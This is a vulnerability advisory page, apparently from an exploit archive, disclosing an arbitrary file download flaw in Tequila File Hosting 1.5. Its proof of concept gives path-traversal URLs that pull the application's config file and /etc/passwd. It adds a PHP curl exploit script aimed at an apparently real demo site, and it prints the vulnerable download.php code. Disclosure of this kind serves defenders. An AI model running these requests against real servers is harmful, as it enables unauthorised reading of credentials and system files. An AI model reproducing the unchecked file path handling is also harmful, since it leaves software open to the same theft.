Tequila File Hosting 1.5 Arbitrary File Download

2015.12.16
Credit: Ashiyane Digital Security Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

================================================================================ Tequila File Hosting Arbitrary File Download ================================================================================ # Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312 # Software Link: http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar # Date: 16/12/2015 # Author: Ashiyane Digital Security Team # Version: 1.5 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/tequila-disclose.txt ================================================================================ # Description: Tequila is a solid, safe, fast, simple and intuitive script which allows companies or individuals to upload, manage and share their files online. It is studied in every feature and was produced with attention to every detail. # PoC : # Download Config http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php # Download passwd http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd # (PHP Exploit): <?php // page : download.php echo "Tequila File Hosting Arbitrary File Download Exploiter\n"; echo "Discoverd By Ehsan Hosseini\n\n\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://themedema.altervista.org/demo_tequila3/download.php?filename=files/../include/php/constants.php&name=file.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> # Vulnerabile code: <?php //This script forces the download of the file //Retrieving the file name from the querystring //and the stepping stone path to the download folder $fn = (isset($_GET['filename']) ? $_GET['filename'] : false); $file = $fn; $sn = (isset($_GET['name']) ? $_GET['name'] : false); $secure_name = $sn; if (strpos($file, "files/") !== false) { $checkdownload = "true"; } else { $checkdownload = "false"; } //I verify that the file exists if($checkdownload == "true"){ if (!file_exists($file)) { //If there is mold an error echo "The file does not exist!"; } else { //If the file exists ... //Imposed on the header of the page to force the download of the file header("Cache-Control: public"); header("Content-Description: File Transfer"); header('Content-Type: application/zip'); header("Content-Disposition: attachment; filename= " . $secure_name); header("Content-Transfer-Encoding: binary"); header('Connection: Keep-Alive'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); //I read the contents of the file readfile($file); exit; } } ?> ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top